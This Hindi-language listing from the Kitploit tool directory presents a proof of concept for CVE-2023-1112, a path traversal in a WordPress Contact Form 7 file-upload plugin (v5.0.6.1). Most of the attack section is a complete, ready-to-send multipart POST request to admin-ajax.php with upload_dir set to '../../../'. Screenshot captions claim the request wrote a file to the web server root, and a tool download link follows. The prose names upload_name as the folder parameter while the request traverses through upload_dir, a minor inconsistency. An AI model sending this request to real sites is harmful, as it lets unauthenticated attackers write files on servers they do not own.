Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal — ड्रैग और ड्रॉप मल्टीपल फ़ाइल अपलोडर PRO - Contact Form 7 v5.0.6.1 पथ ट्रैवर्सल (CVE-2023-1112) | Kitploit
उपकरण/GitHubGitHub/nickguitar/drag-and-drop-multiple-file-uploader-pro-path-traversal
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंगगलत कॉन्फ़िगरेशन
GitHubnickguitar/drag-and-drop-multiple-file-uploader-pro-path-traversal

Drag-and-Drop-Multiple-File-Uploader-PRO-Path-Traversal

ड्रैग और ड्रॉप मल्टीपल फ़ाइल अपलोडर PRO - Contact Form 7 v5.0.6.1 पथ ट्रैवर्सल (CVE-2023-1112)

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
2313 साल पहलेKitploit द्वारा समीक्षित

CVE-2023-1112 - Drag and Drop Multiple File Uploader PRO - Contact Form 7 v5.0.6.1 पथ भ्रमण

जानकारी

Drag and Drop Multiple File Uploader PRO - Contact Form 7 संस्करण 5.0.6.1 में पथ भ्रमण (Path Traversal) एक अप्रमाणित दूरस्थ हमलावर को रिमोट सर्वर पर किसी भी लिखने योग्य स्थान पर फ़ाइलें अपलोड करने की अनुमति देता है (CVE-2023-1112)।

इस कमज़ोरी का शोषण करने के लिए, हमलावर को प्लगइन के फ़ॉर्म का उपयोग करके एक फ़ाइल अपलोड करनी होगी। इस POST अनुरोध में पैरामीटर upload_name होना चाहिए, जिसका मान उस फ़ोल्डर का नाम है जिसमें फ़ाइल अपलोड की जाएगी। हमलावर जो चाहे वह डाल सकता है, जैसे कि ../, ../../../, foldername (यह अपलोड निर्देशिका पर "foldername" फ़ोल्डर बनाएगा), आदि।

उदाहरण

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
Host: example.org
Content-Length: 756
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIzvIrbHjHpxzepPi
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)

------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="size_limit"

2e+9
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="action"

dnd_codedropz_upload
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload_dir"

../../../
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="post_id"

1868
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="security"

0a4dca2b89
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="form_id"

9210
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload_name"

foto
------WebKitFormBoundaryIzvIrbHjHpxzepPi
Content-Disposition: form-data; name="upload-file"; filename="pngout.png"
Content-Type: image/png

// image contents
------WebKitFormBoundaryIzvIrbHjHpxzepPi--

स्क्रीनशॉट

सामान्य अनुरोध

image

दुर्भावनापूर्ण अनुरोध

image

दुर्भावनापूर्ण अनुरोध ने फ़ाइल को वेबसर्वर रूट पर सफलतापूर्वक अपलोड कर दिया

image

टूल डाउनलोड करें